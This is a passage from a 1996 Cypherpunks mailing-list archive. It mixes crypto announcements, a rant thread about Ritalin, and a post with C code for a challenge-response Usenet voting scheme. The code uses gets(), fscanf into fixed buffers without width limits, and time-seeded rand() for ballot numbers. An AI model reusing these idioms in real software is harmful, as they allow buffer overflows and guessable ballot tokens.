Date: Thu, 11 Jul 1996 12:18:20 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: MSoft crypto API's
Message-ID: <199607110029.UAA14178@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 10 Jul 96 at 12:10, David Mazieres wrote:

> What I don't underastand about this arangement is how other people are
> supposed to develop crypto software under capi.  I mean, how is it
> possible to develop a software package if you need to go get it signed
> by microsoft every time you want to test it?

There would be a development kit or version of the OS for developers 
that doesn't require signatures.

Problems are that forgeign developers will want this, and they'll cry 
foul if they can't get ahold of it.  Another problem is that it might 
be bootlegged or pirated if enough people do not trust the system, or 
if adequate software if not available.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 11 Jul 1996 15:02:39 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.LNX.3.94.960708214829.704A-100000@gak>
Message-ID: <Pine.LNX.3.93.960710193438.711C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Jul 1996, Mark M. wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> OK, so I lied.  However, I can fit some crypto relevance into this.
> > On Mon, 8 Jul 1996, Arun Mehta wrote:
> > > Ritalin is a lifesaver for a small % of children who suffer from a condition
> >      Key word here.            |||||||
> > > Ritalin... mother was furious.  
> > > Some of the kids who use foul language (a very small %) have Tourette's
> > > disease, and also need medicine (a different one)... by and large the
> As long as we're talking about "key words", the "very small %" is very small
> indeed.  In the next paragraph you say "most kids" which is not at all
> contradictory to "a very small %".  I may have my facts mixed up, but
> Tourette's disease is an illness where one tends to say things that one was
> thinking but not meaning.

     Tourettes was brought up to explain one small boys behavior towards 
his mother. He would (IIRC) call her a "fucking asshole", yet he didn't 
seem to have these sorts of problems around his father. True tourettes is 
not an emotional problem, it is _very_ rare, and the person with tourettes
does not curse at only one person. 

    Undisiplined brats do have emotional problems. Parents who are under 
the ignorant mis-apprehension that children do not need disipline are the
cause of more than a few of this societies problems. 

> > 
> >      Bullshit. Most kids (these days) who use profanity are simply 
> > undisiplined louts. Yes, I use profanity today, at 28. However, I would 
> > NEVER have called my mother a "Fucking Asshole" under ANY circumstances, 
> > My father would have torn my head off. In fact if my father had caught me
> > speaking like that to ANYONE at 8 years of age, I would have had trouble
> > sitting for a couple days at least. 
> > 
> >      Of course my parents made sure not to talk like that around me. 
> 
> You are forgetting that this is a _disease_.  That means that someone cannot
> be cured of it by discipline or common sense.  It's no different from diabetes
> or any other disease.

     It is a disease becasuse the people who get paid to diagnois and treat 
it call it a disease? 

     Is it a crime because a cop thinks it is a crime? 

     I will admit to the possibility of ADD being a "disease", but I think 
that the number of children who really have the disease is small compared 
to the number of childern recieving drugs for it. 

     15 years ago I would have been diagnoised as having ADD. I had trouble 
paying attention in class, I spent a lot of time looking out the window. I 
was a mild behavior problem. I didn't have ADD. I was simply bored by a 
system that either taught me stuff that was irrelevant (I thought so 15 
years ago, and feel so today), that taught so badly as to seem irrelevant
(like algebra & higher math) (notice SEEM, I feel much different now), or 
taught stuff that was simply wrong (I don't remember examples now, but I 
remember calling teachers on wrong info back in HS, and getting in trouble
for it).
> > 
> > > politically correct thing is sometimes to label a kid as sick rather than
> > > bad or spoiled, this is probably why drugs are over-used.  But we can't
> > > throw the baby out with the bathwater!
> > 
> >      On the other hand, if only 20% of the children that are being drugged
> > need it, that means that we are sacrificing 80% of these children to save 
> > 20%. 
> 
> That wasn't the point.  The point is instead of dopping every kid that doesn't
> pay attention in school up with Ritalin, kids should instead be diagnosed as
> having ADD before receiving Ritalin treatment.  It can be helpful for the kids
> who actually have ADD.
>

	Ok, so instead of arresting everyone who uses PGP as a child 
pornographer and throwing them in jail, we should arrest them, convict them
(after all, they must be hiding something with that crypto) and then throw
them in jail. Is that what you are saying?

	Hoz-a-bout we GIVE THE KIDS SOMETHING TO BE INTERESTED IN HUH? 

        NO, WE CAN"T DO THAT THEY MIGHT ACTUALLY LEARN SOMETHING. 
 
        Look at the difference between the numbers of ADD kids in private 
schools and public schools. 

> >      Drugs are supposed to be for fun, not for long term behavior 
> > modification. People need to learn to deal with life. 
> Someone with a disease such as bipolar disorder would disagree with you.  There
> are some bipolar people who, without lithium, will end up with large wounds

      Uh.. That was a joke. Seriously tho' There is a difference between some
one who takes Lithium to even out neurochemistry, and a person who takes 
prozac to even take the edges off. 

     One is a medical condition, one is a psychological problem. 

> OK, now for the real crypto relevance.  Snow seems to be in denial about
> psychological illnesses.  This is the "it will never happen to me" attitude.

     Last time I checked the only symptom of Bipolar Manic depression I 
didn't have was suicide ideation. I have homicidal ideation. 

     I am not joking at this point. I'd be willindg to bet that I fall
VERY near the "Manic Depressive" line. 


     I just doubt that there are more than a small percentage of people out 
there who have mental illnesses that need strong drugs to combat. More people
SHOULD just learn to deal with it. I have found a couple of things that 
really help take the edge off my problems. Regular exercise is one. I 
recently started bike riding again, and I am doing 22+ miles a day. For the 
first time in about 10 years I have been sleeping a semi-regular schedule
(about 6 hours a night) I have been exercising about 3 weeks now, so we will 
see what happens. 

     This gets into what you are about to say, but in my case I am dealing
with my problems the best I can. It would be a hell of a lot easier to simple
take that little pill and have a nice calm chemical existence. It would be 
a lot easier to allow GAK and escrow. It is much better on all levels to 
deal with it yourself as much as possible. 

     I had never used PGP until today. Yes, I had D/Led it, compiled it, and 
installed it but never published a key, nor encrypted anything. An instance 
arose where someone else insisted I use it, so I figured it out. No problems.

     Part of the reason it was no problem is that I have spent a lot of 
time figuring shit out on my own, and only asking for help when I needed it,
or to help point the way. Too many people don't want that. They want all the 
questions answered for them. They like their mental fog and feel threatened
by people who don't. 

     I'd bet that a lot of these so called "ADD" kids are the ones who ask 
the hard questions in class, the ones who threaten to wake the other students
up. Can't have that. 

> Tyranny can effect anyone and everyone.  It's not limited to criminals.  This
> is why strong crypto is necessary.

     Well, something we agree on anyway. 

     Again, I am not saying that there are NO ADD kids, I know one, and he is 
a mess. However, there are many kids who are labeled ADD who aren't. I know
what Speed does to a person, Been there. Liked that (remember the Manic 
Depressive? I _LIKE_ manic.), but speed is very dangerous stuff, and 
highly addicted. Got an ex-friend to testify to that. Or he would if he 
could breath.  

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 11 Jul 1996 14:23:12 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607090419.AAA11279@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.93.960710203209.711D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, Perry E. Metzger wrote:
> 
> Has it occurred to you that many of the children in question are happy
> being medicated, as are many adults? In any case, who are you to tell
> other people what's good for them?

     This might be a little out of context, but:

     I'd be willing to bet that about 75% of the people on this planet
would be happy being meidicated, and at least 50% get that way on a 
regular basis. The real question is, is it a good idea to teach kids that
drugs are the best answer to a problem? 

     Again and again I will state that I do believe that ADD is a problem, 
but I'd bet that at least half the time you are medicating the kids because
the parents have the problem. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 11 Jul 1996 07:35:56 +0800
To: cypherpunks@toad.com
Subject: [ANNOUNCE] - PGP library for Perl
Message-ID: <199607101852.UAA20882@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



                             PGP LIBRARY FOR PERL
     _________________________________________________________________

                                  DESCRIPTION

   This library contains a suite of PGP modules for Perl. Many of the
   modules require the Systemics Cryptix 1.1 library.

   Although the library is quite usable, it is still a long way from
   being complete, and the interface subject to change.

                                   FEATURES

   This library contains the modules to do the following:
     
     * PGP ascii armouring
     * PGP conventional encryption
     * PGP public key encryption/decryption
     * PGP key generation, including vanity keys!
   
   Note - the current version cannot handle compressed data packets,
   does not handle signatures, and the key management is quite poor.
   
   The library can be downloaded from http://www.systemics.com/software/
   
   Enjoy!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alvaro_Ibanez@idg.encomix.com (Alvaro Iba-ez)
Date: Thu, 11 Jul 1996 09:09:22 +0800
To: cypherpunks@toad.com
Subject: Spanish Crypto Resources Web
Message-ID: <001032BE.fc@idg.encomix.com>
MIME-Version: 1.0
Content-Type: text/plain



Cpunks'

There is a new Spanish Crypto Resources Web page [it"s enterely
in Spanish] on the World Wide Web...

           <http://bbs.seker.es/~alvy/cripto.html>

This page contains information about crypto in Spain, specially
links and info on spanish companies, magazines, associations,
events... and also some info on security, privacy, hackers &
crackers. Quite new right now, I hope it will be updated soon
with info and support from other spanish-speaking crypto-fans.

You will find some global links and references too.

Please, distribute this URL and info freely.

Alvaro Ibanez
-- Author, Writer and... well ;-) amateur crypto-fan 
-- Madrid / Spain
-- e-mail: <100021.1617@compuserve.com>
-- homepage: <http://bbs.seker.es/~alvy> [Spanish]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 11 Jul 1996 15:16:58 +0800
To: cypherpunks@toad.com
Subject: Re: electronic voting
In-Reply-To: <199607101957.MAA09843@netcom7.netcom.com>
Message-ID: <5ioVqD71w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
> [voting techniques]
...

A few days ago I posted the following article to Usenet. It may be of interest.

Subject: Implementing Dr. Grubor's proposals for overhauling Usenet votes
Message-ID: <PmZiqD58w165w@bwalk.dm.com>
Date: Thu, 04 Jul 96 00:57:36 EDT

Recently, Dr. John M. Grubor proposed several improvements to the Usenet vote
procedure. I've implemented Dr. Gurbor's proposals in C, with the objective to
make this code easy to add to L.Ron Dippold's (spit) vote-counting software.

I remind evertone the outline of Dr. Grubor's proposal:

1. The CFV will no longer contain the ballot. Instead it will instruct the
voter to send an e-mail to a GruborBot and request an individualized ballot.
Therefore, there can be no objection to resposting such CFV's.

[To request a ballot for 'ngv', a prospective voter@uhost might
e-mail ngv-ballot@uvv.org (content ignored) or e-mail votebot@uvv.bot
and say 'send ngv-ballot' - either way is easy with procmail]

2. When asked for a ballot, the GruborBot will generate an individualized
one by running a modified version of uvballot. The individualized ballot
e-mailed to voter@uhost will differ in the following ways from the
existing ballot:

 a) it will contain a ballot number.
 b) it will contain a copy of the CFV.
 c) it will contain a random challenge.

The triple (voter@uhost,ballot number,correct response) will be recorded.

[note that the ballot number and the challenge are not redundant ]

[the patches for uvballot are posted below. The patches assume that the CFV is
in the file ./cfvtext, the precomputed challenges are in ./chaldata, and
the outgoing ballots are recorded in ./balrost, but it's easy to change.]

3. The voter is likely to have look at the CFV in order to answer the
random challenge. Also s/he must have a reachable e-mail address.

4. Upon receipt of the ballot from voter@uhost, the modified version of uvvote
will verify the following, in addition to the checks already there:

 a) was a ballot with this number number e-mailed to voter@uhost?
 b) is this the correct response to the challenge given in the
  ballot with this ballot number?

It's possible for a user to request several ballots; all of them should be
acceptable, but only the latest one should be counted, just like now.

Thank you again, Dr. Grubor, for providing guidance for Usenet's growth.

[While at it, someone should change UseVote 3.0 to use ANSI prototypes]

-------------------------------------------------------------------------

/*

prepchal.c

This program reads the file named ./cfvtext and writes ./chaldata.
It generates "challenges" for voters, which mkballot uses.

*/


#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <stdlib.h>

#define MSG(x) fprintf( stderr, x )

/* it's safe to assume that no line in CFV is longer than 80 chars - see USEVOTE*/
#define MAX_CHAL_LINE_BUFFER 80

/* we don't want to use lines with more than this many words */
#define MAX_CHAL_WORDS_PER_LINE 20

/* using fewer words makes lines hard to find */

#define MIN_CHAL_WORDS_PER_LINE 5

/* maximum and minimum length of words for challenge - not too much
typing, nor too easy to guess */
#define MAX_CHAL_WORD_LEN 14
#define MIN_CHAL_WORD_LEN 4

/* maximum challenges, really should have been dynamic */
#define MAX_CHALS 6000

typedef struct {
char * word;
char * line;
char flag;
} chal;

chal this;
chal chals[MAX_CHALS];
int num_chals;

char line_buffer[MAX_CHAL_LINE_BUFFER];
int line_buffer_length;
char word_begin[MAX_CHAL_WORDS_PER_LINE];
char word_length[MAX_CHAL_WORDS_PER_LINE];

/* these words are often too easy to guess - may be sorted if expanded */
char *easy_words[]={
"about","aren","because","could","couldn","didn","does","doesn","else",
"hadn","hasn","have","just","like","must","mustn","only","shouldn","since",
"some","such","than","that","their","them","then","there","these","they",
"this","those","wasn","what","when","where","which","whose","will","with",
"would","wouldn","your"
};

#define NUM_EASY_WORDS (sizeof(easy_words)/sizeof(easy_words[0]))

int find_words(void);
int add_chal(int word_begin,int word_length);
int save_chals(void);
int generate_chals(void);

FILE *infile,*outfile;

int main(void)
{

if (NULL==(infile=fopen("cfvtext","r")))
 {
 perror("fopen cfvtext");
 return(1);
 }

if (NULL==(outfile=fopen("chaldata","w")))
 {
 perror("fopen chaldata");
 return(1);
 }

generate_chals();

if (num_chals==0)
 {
 MSG("No challenged generated\n");
 return(1);
 }

save_chals();

fclose(infile);
fclose(outfile);

return(0);
}

/* return the number of words in buffer, and save their beginnings and lengths */
int find_words(void)
{
int in_word,i,num_words;

num_words=0;
i=0;
in_word=0;
for(;;)
 {
 if (isalpha(line_buffer[i]))
  {
  if (!in_word)
   {
   if (num_words>=MAX_CHAL_WORDS_PER_LINE)
    return(0); /* this line is too complex for the challenge */
   word_begin[num_words]=i;
   word_length[num_words]=1;
   in_word=1;
   }
  else /* in_word */
   if ((word_length[num_words]++)>=MAX_CHAL_WORD_LEN)
    in_word=0;
  }
 else /* !isalpha */
  {
  if (in_word)
   {
   in_word=0;
   if (word_length[num_words]>=MIN_CHAL_WORD_LEN)
    num_words++;
   }
  if (line_buffer[i]=='\0')
   break;
  }
 i++;
 }
return (num_words>MIN_CHAL_WORDS_PER_LINE ? num_words : 0);
}

/* add the challenge to the data structure, verifying that it's not redundant */

int add_chal(int word_begin,int word_length)
{
int i;
int hi,lo,m,md;

this.word=this.line=NULL;

if (NULL==(this.word=(char*)malloc(word_length+1)))
 {
 MSG("malloc word failed - partial results\n");
 return(1);
 }

if (NULL==(this.line=(char*)malloc(line_buffer_length+1)))
 {
 free(this.word);
 MSG("malloc line failed - partial results\n");
 return(1);
 }

/* copy the word, translating to lowercase */
for (i=0; i<word_length; i++)
 this.word[i]=(line_buffer[word_begin+i]>='A'&&line_buffer[word_begin+i]<='Z')?
  line_buffer[word_begin+i]+('z'-'Z'):line_buffer[word_begin+i];
this.word[word_length]=0;

/* copy the line, replacing the word by underscores */
memcpy(this.line,line_buffer,line_buffer_length+1);
memset(this.line+word_begin,'_',word_length);

/* binary search: see if the word is too easy */

this.flag=2;
lo=0;
hi=NUM_EASY_WORDS-1;

while (this.flag==2)
{
if (hi<lo) /* not found */
 this.flag=0;
/* continue searching */
md=(hi+lo)/2;
m=strcmp(this.word,easy_words[md]);
if (m==0)
 this.flag=1; /* don't use, but continue checking for ambiguities */
else if (m<0)
 hi=md-1;
else
 lo=md+1;
}

/* binary search: see if this challenge is ambiguous */

lo=0;
hi=num_chals-1;

for(;;)
{
if (hi<lo) /* not found */
 {
 if (num_chals>=MAX_CHALS)
  {
  MSG("MAX_CHALS exceeded - partial results\n");
  free(this.word);
  free(this.line);
  return(1);
  }
 /* insert */
 for (i=num_chals; i>lo; i--)
  chals[i]=chals[i-1];
 chals[lo]=this;
 num_chals++;
 return(0);
 }
/* continue searching */
md=(hi+lo)/2;
m=strcmp(this.line,chals[md].line);
if (m==0)
 { /* found - don't insert */
 if (0!=strcmp(this.word,chals[md].word))
  chals[md].flag=1; /* ambiguous */
 free(this.word);
 free(this.line);
 return(0);
 }
else if (m<0)
 hi=md-1;
else
 lo=md+1;
}

}

int save_chals(void)
{
int i,j;

/* write the adjusted number of challenges */
j=num_chals;
for (i=0; i<num_chals; i++)
 if (chals[i].flag)
  j--;

fprintf(outfile,"%d\n",j);

for (i=0; i<num_chals; i++)
 {
 if (!chals[i].flag)
  fprintf(outfile,"%s,%s\n",chals[i].word,chals[i].line);
 free(chals[i].word);
 free(chals[i].line);
 }

return(0);
}

/* process the CFV line by line */

int generate_chals(void)
{
int i,j;

num_chals=0;
while (NULL!=fgets(line_buffer,MAX_CHAL_LINE_BUFFER,infile))
 {
 line_buffer_length=strlen(line_buffer);
 if (line_buffer[line_buffer_length-1]=='\n') /* drop trailing lf */
  line_buffer[--line_buffer_length]=0;
 i=find_words();
 for (j=0; j<i; j++)
  if (0!=add_chal(word_begin[j],word_length[j]))
   return(0); /* graceful exit if malloc fails */
 }
return(0);
}


-------------------------------------------------------------------------

patches for uvballot (which needs to be run anew every time a ballot is
requested):


/* we pretend that when user@host e-mails ng-ballot-request@uvv.org,
this program is invokes with user@host in argv[1]. This code should
be added to uvballot.c, but each voter should get an individualized
ballot */

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>

#define MSG(x) fprintf( stderr, x )

FILE *cfvfile,*chalfile,*balfile;

int main(int argc,char *argv[])
{
char ballot_number[20];
int num_chals,num_skip,c;
char word[11],line[81];
char *addr=argv[1];

if (argc!=2)
 {
 MSG("argv[1] should be user@host\n");
 return(1);
 }

/* randomize seed */
 srand((unsigned)time(NULL));

/* open files */
if (NULL==(cfvfile=fopen("cfvtext","r")))
 {
 perror("fopen cfvtext");
 return(1);
 }

if (NULL==(chalfile=fopen("chaldata","r")))
 {
 perror("fopen chaldata");
 return(1);
 }

if (NULL==(balfile=fopen("balrost","a")))
 {
 perror("fopen balrost");
 return(1);
 }

/* generate ballot number */
sprintf(ballot_number,"%d%d%d",rand(),rand(),rand());

/* pick a random challenge number */
fscanf(chalfile,"%d\n",&num_chals);
num_skip=rand()%(num_chals-1);

/* skip lines */
while(num_skip)
 if ('\n'==fgetc(chalfile))
  num_skip--;

fscanf(chalfile,"%[^,],%[^\n]\n",word,line);

fclose(chalfile);

/* remember the combination of user@host,ballot_number,word */

fprintf(balfile,"%s,%s,%s\n",
addr,ballot_number,word);

fclose(balfile);

/* generate the individualized ballot - this needs to be there in
addition to the code already in uvballot */

printf("\n\
This ballot is being e-mailed to: %s\n\
\n\
Ballot number: %s\n\
Missing word:\n\
\n\
The Call for Votes is attached after the ballot. Please read it carefully\n\
before voting. Then, find the line in the CFV that looks like this:\n\
%s\n\
and fill in the missing word in the ballot\n\
\n\n",addr,ballot_number,line);

/* copy the CFV */

while (EOF!=(c=fgetc(cfvfile)))
 fputc(c,stdout);

fclose(cfvfile);

return(0);
}

-------------------------------------------------------------------------

patches for uvvote:

/*

functionality to be added to uvvote.c

*/

#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <stdlib.h>

#define MSG(x) fprintf( stderr, x )

char addr[80];
char ballot_number[80], word[80];

FILE *balfile;

/* return values:

0 - acceptable ballot
1 - no ballot ever e-mailed to this addr
2 - ballot(s) e-mailed to this addr, but no ballot_number matches
3 - wrong word in response to the challenge

*/

int ballot_check(void)
{
int rc;
char this_addr[80],this_ballot_number[80],this_word[80];

/* anything other than sequential search isn't worth it here */

rewind(balfile);
rc=1;
while (rc&&(3==fscanf(balfile,"%[^,],%[^,],%[^\n]\n",this_addr,this_ballot_number,this_word)))
 if (0==strcmp(addr,this_addr))
  {
  if (rc==1)
   rc=2;
  if (0==strcmp(ballot_number,this_ballot_number))
   {
   if (rc==2)
    rc=3;
   if (0==strcmp(word,this_word))
    rc=0;
   }
  }

return(rc);
}

/* test main */

int main(void)
{
int i;


if (NULL==(balfile=fopen("balrost","r")))
 {
 perror("fopen balrost");
 return(1);
 }

for(;;)
 {
 printf("(uvvote would get these from the ballot it's processing)\n\
Type . to end demo\n\
addr: ");
 gets(addr);
 if (0==strcmp(addr,".")) break;
 printf("ballot_number: ");
 gets(ballot_number);
 printf("missing word: ");
 gets(word);

 /* remember to map the word to lowercase. It may be worthwhile to
 lowercase addr too (both here and in new uvballot)  */
 for (i=0; word[i]; i++)
  if (word[i]>='A'&&word[i]<='Z')
   word[i]+='a'-'A';

 printf("ballot_check=%d\n",ballot_check());
 }

close(balfile);

return(0);
}

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: caal@hopf.dnai.com
Date: Thu, 11 Jul 1996 16:24:41 +0800
To: cypherpunks@toad.com
Subject: Information
Message-ID: <199607110432.VAA05249@hopf.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks:

I'm new here and without taking too much bandwidth, I'd like to ask you for
some assistance.  I am wondering if there is a precise way of figuring out
where a web/mail server is based, or at least get some identifying
information.  I think I saw some messages on this list a few weeks ago about
how easy it is to identify a server or ISP, with just an address (web or
e-mail address).  Is this possible and how?  I would appreciate any guidance
you may provide and I hope this request is not too much against the
etiquette of this group.  Thank you.

Boris





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 11 Jul 1996 19:17:27 +0800
To: cypherpunks@toad.com
Subject: "White 'Punks on Dope" (w apologies to The Tubes)
Message-ID: <ae09d30700021004f018@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(The explanation of "White 'Punks on Dope" will come in the second part of
this post, along with a baby's arm holding an Apple, for no fee or
waybill.)

At 1:14 AM 7/11/96, snow wrote:

>     Tourettes was brought up to explain one small boys behavior towards
>his mother. He would (IIRC) call her a "fucking asshole", yet he didn't
>seem to have these sorts of problems around his father. True tourettes is
>not an emotional problem, it is _very_ rare, and the person with tourettes
>does not curse at only one person.

I of course never invoked "Tourette's Syndrome" as a likely reason for the
kid's behavior. It is unlikely in the extreme, as I've seen the kid
firsthand for several hours and he has never uttered a stereotypical
Tourette's Syndrome sort of thing in my presence. The likely reason for his
outburst is covered below.

>    Undisiplined brats do have emotional problems. Parents who are under
>the ignorant mis-apprehension that children do not need disipline are the
>cause of more than a few of this societies problems.

Indeed, this is almost certainly why he screamed obscenities at his mother.
He did it because he _could_ do it, that is, because she refuses to punish
him.  And he gets a reward out of it, namely, attention. This is a pattern
as old as humanity, of course.

Mostly such temper tantrums and outbursts are held in check by the threat
of sanctions by the parents, e.g., confinement (grounding), corporal
punishment (beltings), denial of food (going to bed hungry), etc. Children
above a certain age--maybe 4 or so--are quite aware of the consequences of
their actions and the "game-theoretic" tradeoffs involved. Most reduce
their frequency and magnitude of "acting out". This has worked well for
millenia.

In recent decades, do-gooders have taken upon themselves to intervene in
the parenting process and have essentially succeeded in making such
sanctions harder for parents to impose. Schools routinely teach young
children to inform on their parents if they have been spanked, touched,
talked to "inappropriately," etc. Check out the parent's rights newsgroups
(and father's rights) for tales of interrogations by agents of Child
Protective Services, who are empowered to remove a child immediately and
without court proceedings if they merely _suspect_ a child has been treated
in ways the State has deemed no longer appropriate. (I'm sure many of us
agree that children should not have their jaws broken, should not be burned
by cigarette butts as punishment, and should not be confined in closets for
weeks at a time. The laws are well-intentioned. But as with many such
well-intentioned laws, the "law of unintended consequences" has given Child
Protective Services almost Gestapo-like powers to enter private homes, to
intervene in custody disputes, and to assume guilt until innocence is
proven.)

So, what to do with children who are otherwise uncontrollable?

Ah, the State has the answer. And its name begins with "R." 'Nuff said.

>     I will admit to the possibility of ADD being a "disease", but I think
>that the number of children who really have the disease is small compared
>to the number of childern recieving drugs for it.

This is the point I have been making. Not that ADD (aka ADHD,
hyperactivity, etc.) does not sometimes exist, but that giving Ritalin and
suchlike drugs to children has been a panacea for fidgeting, wandering
attention, boredom, "cutting up" in class, class clowns, and so on.

And perhaps worse, _parents_, such as the example I provided, are using it
to control children. Where once they would've paddled the kid for using
obscene language, or refusing to get dressed for school, now they pop a
pill in the child's mouth.

>     15 years ago I would have been diagnoised as having ADD. I had trouble
>paying attention in class, I spent a lot of time looking out the window. I
>was a mild behavior problem. I didn't have ADD. I was simply bored by a
>system that either taught me stuff that was irrelevant (I thought so 15

I suspect this was true of 90% or more of us on this list...we're a bright
lot, and it's hard to imagine that _any_ school could keep us from being
bored a lot of the time. (And hard classes can be boring, too.)

>        Ok, so instead of arresting everyone who uses PGP as a child
>pornographer and throwing them in jail, we should arrest them, convict them
>(after all, they must be hiding something with that crypto) and then throw
>them in jail. Is that what you are saying?

Obviously any school child who refuses to open his backpack for the morning
inspection has Privacy Fixation Syndrome. Any school child who refuses to
discuss his thoughts about his or her budding sexuality with the school
nurse has Privacy Fixation Syndrome. This Syndrome has become rampant in
recent years, say psychiatrists and social workers. Some of these children
are even using PGP to *encrypt* their files! This interferes with a
wholesome and nurturing educational experience. Child Protective Services
has begun to ask children if their parents are maintaining a proper
environment at home. Use of PGP and other such tools of the paranoid
crypto-militias is considered positive evidence of an unwholesome home
environment.

Fortunately, pediatric psychiatrists have discovered that Privacy Fixation
Syndrome is treatable in the school environment with Prozac, Xanac, and
Quaaludes. A moderate dose of these drugs appears to remove the compulsion
to keep things secret, and assists in the child's ability to share his
innermost thoughts with school nurses, teachers, and administrators. (Note
to school administrators: A side benefit is that this lessening of "privacy
anxiety" also makes investigation of the parental-units much easier. Prozac
appears to be as effective as scopalaimine in extracting the details of
home enviroments from children-units.)

--Dr. Klaus von Ritalin, specializing in Privacy Fixation Syndrome







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 11 Jul 1996 10:34:11 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607101459.KAA16411@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.94.960710221620.2972A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 10 Jul 1996, Perry E. Metzger wrote:

> Date: Wed, 10 Jul 1996 10:59:58 -0400
> From: "Perry E. Metzger" <perry@piermont.com>
> To: Clay Olbon II <Clay.Olbon@dynetics.com>
> Cc: cypherpunks@toad.com
> Subject: Re: [RANT] Giving Mind Control Drugs to Children 
> 
> 
> "Clay Olbon II" writes:
> > While it is crucial for an adult to be able to function and maintain a job,
> > is it really as important for a kid to be able to sit still in school?  
> 
> If he or she is going to learn anything, it is important to be able to
> pay attention, yes.
> 
> Perry
> 

Thats a non-answer.  Paying attention and sitting still are two different
things.  I can't sit still, but I can pay attention (well, in some
classes)

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeQsmjAJap8fyDMVAQGreQf8DWOrX4stJXPheWqnnmXIx7eCGiRdwxhS
YlOfy1pfakHeKJHdpGZGvsT4ojrXBMMqxeltisAYF1XukJDDwF6681T6/ekL46yd
rZe8qzgIsBUbuIJdt1Lw5cbRYK772WHPu8LnZX0T+1Gg+vZ+Bu/TGRRZ+nATpuwH
z1uiBH1q8znhD0NFQ/M6i+5gTBZx0Obil2ri6jaP2UAhcetauj6Vv3tvX1Ii6klf
EubP8/NqgaZ4Atn1M9mrVODpjlqua3+t1FCy1dxSV+V33cGDZ6glAW3aM6N890ED
IPY4rvvgJryjfsYpN92t76KPpQnieVenu4z+di108EqdGABhNGv5eA==
=GGWS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Price <wprice@primenet.com>
Date: Thu, 11 Jul 1996 17:38:15 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
Message-ID: <v03007602ae0a51a2c9bf@[206.16.90.42]>
MIME-Version: 1.0
Content-Type: text/plain


ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
_______________________________________________________

MIT has released Philip Zimmermann's PGPfone 1.0b7 for Macintosh and
1.0b2 for Windows95 or NT.  This new secure telephone product is now
available for download at the MIT PGP distribution web site:

     http://web.mit.edu/pgp
or:  http://web.mit.edu/network/pgpfone

Using PGPfone is like using a telephone, except no one else can
eavesdrop on your conversation.  PGPfone lets you whisper in someone's
ear, even if their ear is a thousand miles away.  Secure voice calls
are supported over the Internet, or through a direct modem-to-modem
connection, or even over AppleTalk networks.

PGPfone uses Diffie-Hellman public-key technology to provide encryption
keys for the user's selection of CAST, TripleDES, or Blowfish
encryption algorithms.  A unique biometric authentication feature uses
spoken words to authenticate the Diffie-Hellman key exchange allowing
easy authentication of secure calls.  This new version introduces CAST,
a fast and well-designed new encryption algorithm from Northern
Telecom.  The use of Diffie-Hellman in PGPfone allows secure calls to
parties that are not previously known to the caller -- no prior key
exchange over other channels is necessary.

PGPfone 1.0b2 for Windows is an improved version which is now on par
with the Macintosh version.  It now supports silence detection, much
improved sound quality, significantly reduced latency, completely new
interface, faster call negotiation, and some important bug fixes.

A commercial version of PGPfone will be available in the fall from
Phil's new company, Pretty Good Privacy, Inc.  The company may be
contacted at 415 631-1747, or at http://www.pgp.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 11 Jul 1996 17:02:10 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
